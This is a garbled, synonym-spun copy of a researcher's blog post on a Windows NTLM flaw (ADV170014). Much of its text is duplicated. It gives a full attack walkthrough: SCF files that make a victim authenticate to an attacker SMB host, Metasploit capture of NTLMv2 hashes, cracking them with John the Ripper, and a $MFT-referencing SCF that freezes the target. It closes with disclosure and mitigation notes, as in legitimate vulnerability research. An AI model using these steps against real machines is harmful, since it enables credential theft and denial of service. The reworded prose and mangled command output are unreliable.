October 2017, Microsoft spell Tuesday included an optional safety advisory, ADV170014, this advisory makes reference to a põrnikas on the NTLM authentication scheme, that allows a malicious aggressor to steal hashes in addition to to remote freeze the vulnerable machine.
I’ve reported this põrnikas on May 24 2017, in addition to was officially unopen yesteryear Microsoft on Oct xviii 2017.
Influenza A virus subtype H5N1 total of 148 days was the fourth dimension required yesteryear Microsoft to banking concern fit this issue.
I’m making this world now, after Oct spell Tuesday, that the official ‘solution’ went public, immediately it’s upwardly to organisation administrator to apply the spell on the registry, if their electrical current province of affairs allows that, But we’ll become dorsum to that after on.
But, most of these techniques require user intervention or traffic interception to fulfill the attack.
These novel attacks require no user interaction, everything is done from the attacker’s side, but of course, at that spot are some weather that demand to hold upwardly met to hold upwardly successful amongst this attack.
Let’s nation that the user ‘Juan’, creates a folder on his Desktop called ‘Prueba2’, in addition to decides to part that folder amongst his team.
Now, let’s motility to the ‘Sharing’ tab to alteration the folder properties in addition to allow sharing without using passwords.
Here nosotros tin run across the shared folder path, \\JUAN-PC\Users\juan\Desktop\prueba2
Now, nosotros must click on ‘Network in addition to Sharing center’
Here nosotros click on ‘Turn off password protected sharing’ option, this basically allows whatever user to access the shared folder without authentication.
There are already a few SCF file- based attacks, but until now, all these attacks requires user intervention to execute the SCF file.
We conduct maintain 2 recent examples, the attacks created by Bosko Stankovic from Defense Code, inwards the paper Stealing Windows Credentials Using Google Chrome also the 2015 Black Hat presentation where Jonathan Brossard in addition to Hormazd Billimoria demonstrated the assault called SMB: Sharing to a greater extent than than only your files.
The basic SCF file construction is every bit follows:
Just that, it is worth to holler upwardly that SCF files are some of the to a greater extent than obscure Windows functionalities, in addition to that the documentation is almost non existent.
The machine amongst the IP address 192.168.1.111 is our attacking machine, where nosotros are running capture/smb Metasploit module
We are going to likewise use John the Ripper to fissure the hashes, that’s why nosotros define the option JOHNPWFILE , pointing it to the file /tmp/smbhash.txt, where hopefully we’ll conduct maintain our captured hashes.
At this point, the ‘Prueba2’ folder is totally empty, but at that spot is no demand to conduct maintain it empty.
With everything inwards place, nosotros upload the SCF file to the vulnerable folder using whatever method nosotros desire to use, OSX Finder, Windows file explorer or inwards this instance the dominance trace utility smbclient.
The vulnerable folder immediately contains our SCF file
At this point, our Metasploit console must hold upwardly showing something similar this
As you lot run across see, a unmarried upload tin trigger several authentication requests, hence no demand to worry nigh that.
Now that nosotros conduct maintain the hashes on our attacking machine, nosotros tin utilization John to endeavour to larn the manifestly text.
John was able to recover the plaintext, the logged inwards user ‘juan’ has a uncomplicated password ‘abc’.
We require the same vulnerable folder, nosotros tin utilization the same i nosotros utilization on the outset step, nosotros likewise demand a SCF file, amongst a piffling difference.
This SCF files contains a telephone telephone to $MFT, which locks the NTFS filesystem, this is discussed on this weblog entry (Sorry, solely Spanish) or you lot tin conduct maintain a await on the cyberspace for amend resources on the topic.
Now, nosotros only upload the SCF file to the vulnerable machine, using i time to a greater extent than smbclient
And that’s all, at that spot is no demand for to a greater extent than intervention from the aggressor or the user, the machines immediately starts to lock the file organisation until the bespeak it needs a reboot.
Honestly, I conduct maintain solely tested on Windows seven in addition to Windows 10, in addition to then I passed the ball to Microsoft
Another upshot is that disabling NTLM volition intermission a lot of environments, in addition to that’s a huge trace of piece of work organisation for them.
My proposition is to utilization potent passwords, after the assault nosotros demand to fissure the hash, that tin conduct maintain a lot of fourth dimension if the password is complex, in addition to tin hold upwardly frustrating for the attacker.
The amend approach, don’t part folders without passwords, that’ll exercise the trick.
It is hence uncomplicated that allows almost anybody to exploit it, the adept matter is that certains weather are needed to hold upwardly successful on the exploitation, the default Windows configuration is non vulnerable.
I desire to give cheers to Microsoft Security Response Center, they worked difficult to endeavour to cook this, in addition to provided a partial spell for the issue, a total spell was non possible without breaking Windows at all.
This exploit was non possible without the splendid piece of work done yesteryear Bosko Stankovic from Defense Code inwards the paper Stealing Windows Credentials Using Google Chrome and Jonathan Brossard / Hormazd Billimoria’s Black Hat presentation SMB: Sharing to a greater extent than than only your files.
And of course, give cheers you lot for reading this quite long weblog entry.
Cheers!
I’ve reported this põrnikas on May 24 2017, in addition to was officially unopen yesteryear Microsoft on Oct xviii 2017.
Influenza A virus subtype H5N1 total of 148 days was the fourth dimension required yesteryear Microsoft to banking concern fit this issue.
I’m making this world now, after Oct spell Tuesday, that the official ‘solution’ went public, immediately it’s upwardly to organisation administrator to apply the spell on the registry, if their electrical current province of affairs allows that, But we’ll become dorsum to that after on.
The vulnerability
It is a known upshot that Microsoft NTLM architecture has some failures, hash stealing is non something new, it is i of the outset things a pentester tries when attacking a Microsoft environment.But, most of these techniques require user intervention or traffic interception to fulfill the attack.
These novel attacks require no user interaction, everything is done from the attacker’s side, but of course, at that spot are some weather that demand to hold upwardly met to hold upwardly successful amongst this attack.
Attack scenario
To execute this assault a shared folder amongst no password protection is required on the target machine, this is normal deportment on offices, schools, hospitals in addition to almost all Windows environments, people part folders to part music, photos in addition to documents.Let’s nation that the user ‘Juan’, creates a folder on his Desktop called ‘Prueba2’, in addition to decides to part that folder amongst his team.
Carpeta vulnerable compartida en Windows
Pestaña de propiedades compartidas en carpeta vulnerable
Here nosotros tin run across the shared folder path, \\JUAN-PC\Users\juan\Desktop\prueba2
Now, nosotros must click on ‘Network in addition to Sharing center’
Network in addition to Sharing center, propiedades de carpeta vulnerable.
Here nosotros click on ‘Turn off password protected sharing’ option, this basically allows whatever user to access the shared folder without authentication.
SCF files
SCF files were introduced yesteryear Microsoft on Windows 3.11 time, These are manifestly text files that teach Windows File Explorer to execute some basic tasks.There are already a few SCF file- based attacks, but until now, all these attacks requires user intervention to execute the SCF file.
We conduct maintain 2 recent examples, the attacks created by Bosko Stankovic from Defense Code, inwards the paper Stealing Windows Credentials Using Google Chrome also the 2015 Black Hat presentation where Jonathan Brossard in addition to Hormazd Billimoria demonstrated the assault called SMB: Sharing to a greater extent than than only your files.
The basic SCF file construction is every bit follows:
1 2 3 4 5 | [Shell]Command=2IconFile=\\192.168.1.101\share\test.ico[Taskbar]Command=ToggleDesktop |
The attack, Steal the hash
To perform this attack, nosotros are going to utilization Metasploit, in addition to a SCF file crafted the next way. 1 2 3 4 5 6 7 8 | root@sysadminjd: # truthful cat test.scf[Shell]Command=2IconFile=\\192.168.1.111\share\test.ico[Taskbar]Command=ToggleDesktoproot@sysadminjd: # |
1 2 3 4 5 6 7 8 9 10 | root@sysadminjd: # msfconsole -qmsf > use auxiliary/server/capture/smbmsf auxiliary(smb) > laid JOHNPWFILE /tmp/smbhash.txtJOHNPWFILE = /tmp/smbhash.txtmsf auxiliary(smb) > exploit -j[*] Auxiliary module running every bit background job[*] Server started.msf auxiliary(smb) |
At this point, the ‘Prueba2’ folder is totally empty, but at that spot is no demand to conduct maintain it empty.
Carpeta vulnerable antes del ataque
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 | root@sysadminjd: # smbclient //192.168.1.67/UsersWARNING: The "syslog" option is deprecatedEnter root's password:OS=[Windows seven Ultimate 7601 Service Pack 1] Server=[Windows seven Ultimate 6.1]smb: \> cd juansmb: \juan\> cd Desktop\smb: \juan\Desktop\> cd prueba2\smb: \juan\Desktop\prueba2\> set test.scfputting file test.scf every bit \juan\Desktop\prueba2\test.scf (88.9 kb/s) (average 88.9 kb/s)smb: \juan\Desktop\prueba2\> ls. D 0 Monday Oct 23 12:27:15 2017.. D 0 Monday Oct 23 12:27:15 2017.DS_Store AH 6148 Tue May 23 17:29:03 2017test.scf Influenza A virus subtype H5N1 91 Monday Oct 23 12:27:15 20176527487 blocks of size 4096. 4043523 blocks availablesmb: \juan\Desktop\prueba2\>root@sysadminjd: # |
Carpeta vulnerable con archivo SCF
At this point, our Metasploit console must hold upwardly showing something similar this
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 | msf auxiliary(smb) >[*] SMB Captured - 2017-10-23 12:27:15 -0400NTLMv2 Response Captured from 192.168.1.67:49163 - 192.168.1.67USER:juan DOMAIN:juan-PC OS: LM:LMHASH:DisabledLM_CLIENT_CHALLENGE:DisabledNTHASH:47894338d99abe2f08e2c693618c7323NT_CLIENT_CHALLENGE:0101000000000000d0046aca1b4cd301d755c3756d5639d800000000020000000000000000000000[*] SMB Captured - 2017-10-23 12:27:15 -0400NTLMv2 Response Captured from 192.168.1.67:49163 - 192.168.1.67USER:juan DOMAIN:juan-PC OS: LM:LMHASH:DisabledLM_CLIENT_CHALLENGE:DisabledNTHASH:e97b70559f29462e2ca221d31113b9caNT_CLIENT_CHALLENGE:0101000000000000a0177dca1b4cd301f59d5c5d52708e3b00000000020000000000000000000000[*] SMB Captured - 2017-10-23 12:27:15 -0400NTLMv2 Response Captured from 192.168.1.67:49163 - 192.168.1.67USER:juan DOMAIN:juan-PC OS: LM:LMHASH:DisabledLM_CLIENT_CHALLENGE:DisabledNTHASH:eb8b228b739cc95a12d7e0d89d89e002NT_CLIENT_CHALLENGE:0101000000000000620389ca1b4cd3017283fc96884767b700000000020000000000000000000000[*] SMB Captured - 2017-10-23 12:37:09 -0400NTLMv2 Response Captured from 192.168.1.67:49164 - 192.168.1.67USER:juan DOMAIN:juan-PC OS: LM:LMHASH:DisabledLM_CLIENT_CHALLENGE:DisabledNTHASH:4abb0803c4afd1509bfca3bbc566ad70NT_CLIENT_CHALLENGE:010100000000000076d7742c1d4cd30161b2c77a54bd58fe00000000020000000000000000000000[*] SMB Captured - 2017-10-23 12:37:09 -0400NTLMv2 Response Captured from 192.168.1.67:49164 - 192.168.1.67USER:juan DOMAIN:juan-PC OS: LM:LMHASH:DisabledLM_CLIENT_CHALLENGE:DisabledNTHASH:5eeb82aab85e9663624aaf6500e4d8f8NT_CLIENT_CHALLENGE:010100000000000046ea872c1d4cd301c7a724adf323918c00000000020000000000000000000000[*] SMB Captured - 2017-10-23 12:37:09 -0400NTLMv2 Response Captured from 192.168.1.67:49164 - 192.168.1.67USER:juan DOMAIN:juan-PC OS: LM:LMHASH:DisabledLM_CLIENT_CHALLENGE:DisabledNTHASH:55a0cb725a5a171cffdccea36fdcd934NT_CLIENT_CHALLENGE:010100000000000054118f2c1d4cd301f718b1ba2d4efc7800000000020000000000000000000000 |
Now that nosotros conduct maintain the hashes on our attacking machine, nosotros tin utilization John to endeavour to larn the manifestly text.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 | root@sysadminjd: # cd /tmp/root@sysadminjd:/tmp# privy smbhash.txt_netntlmv2Using default input encoding: UTF-8Rules/masks using ISO-8859-1Loaded half dozen password hashes with 6 unlike salts (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])Press 'q' or Ctrl-C to abort, almost whatever other fundamental for statusabc (juan)abc (juan)abc (juan)abc (juan)abc (juan)abc (juan)6g 0:00:00:00 DONE 2/3 (2017-10-23 12:27) 75.86g/s 404596p/s 585124c/s 585124C/s abcUse the "--show" option to display all of the cracked passwords reliablySession completedroot@sysadminjd:/tmp# |
The attack, freezing the machine
The mo assault allows us to freeze the remote machine remotely, let’s run across how.We require the same vulnerable folder, nosotros tin utilization the same i nosotros utilization on the outset step, nosotros likewise demand a SCF file, amongst a piffling difference.
1 2 3 4 5 6 7 | root@sysadminjd: # truthful cat mft.scf[Shell]Command=2IconFile= c:\$MFT\123[Taskbar]Command=ToggleDesktoproot@sysadminjd: # |
Now, nosotros only upload the SCF file to the vulnerable machine, using i time to a greater extent than smbclient
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 | root@sysadminjd: # smbclient //192.168.1.67/UsersWARNING: The "syslog" option is deprecatedEnter root's password:OS=[Windows seven Ultimate 7601 Service Pack 1] Server=[Windows seven Ultimate 6.1]smb: \Z cdDefault\ desktop.ini juan\ Public\smb: \> cd juan\Desktop\prueba2\smb: \juan\Desktop\prueba2\> ls. D 0 quarta-feira May 24 18:08:34 2017.. D 0 quarta-feira May 24 18:08:34 2017.DS_Store AH 6148 Tue May 23 17:29:03 20171.exe Influenza A virus subtype H5N1 7168 Tue May 23 17:29:03 2017prueba.scf Influenza A virus subtype H5N1 92 quarta-feira May 24 18:08:34 20176527487 blocks of size 4096. 4156104 blocks availablesmb: \juan\Desktop\prueba2\> set mft.scfputting file mft.scf every bit \juan\Desktop\prueba2\mft.scf (17.6 kb/s) (average 17.6 kb/s) |
Who is vulnerable?
Accordingly to Microsoft, all Windows versions since 3.11 till Windows 10, Desktop in addition to server are vulnerable to this variety of attack.Honestly, I conduct maintain solely tested on Windows seven in addition to Windows 10, in addition to then I passed the ball to Microsoft
Mitigation
Microsoft created a sort of spell to this vulnerability consisting inwards changing 2 registry keys to disable NTLM on the system. This registry keys are available solely on Windows 10 in addition to Windows Server 2016, in addition to Microsoft has no intentions to backport to the other versions.Another upshot is that disabling NTLM volition intermission a lot of environments, in addition to that’s a huge trace of piece of work organisation for them.
My proposition is to utilization potent passwords, after the assault nosotros demand to fissure the hash, that tin conduct maintain a lot of fourth dimension if the password is complex, in addition to tin hold upwardly frustrating for the attacker.
The amend approach, don’t part folders without passwords, that’ll exercise the trick.
Acknowledgments in addition to concluding comments
This vulnerability has been some for a long long time, I conduct maintain been exploiting this for almost a twelvemonth now, on my pentesting tasks of course.It is hence uncomplicated that allows almost anybody to exploit it, the adept matter is that certains weather are needed to hold upwardly successful on the exploitation, the default Windows configuration is non vulnerable.
I desire to give cheers to Microsoft Security Response Center, they worked difficult to endeavour to cook this, in addition to provided a partial spell for the issue, a total spell was non possible without breaking Windows at all.
This exploit was non possible without the splendid piece of work done yesteryear Bosko Stankovic from Defense Code inwards the paper Stealing Windows Credentials Using Google Chrome and Jonathan Brossard / Hormazd Billimoria’s Black Hat presentation SMB: Sharing to a greater extent than than only your files.
And of course, give cheers you lot for reading this quite long weblog entry.
Cheers!
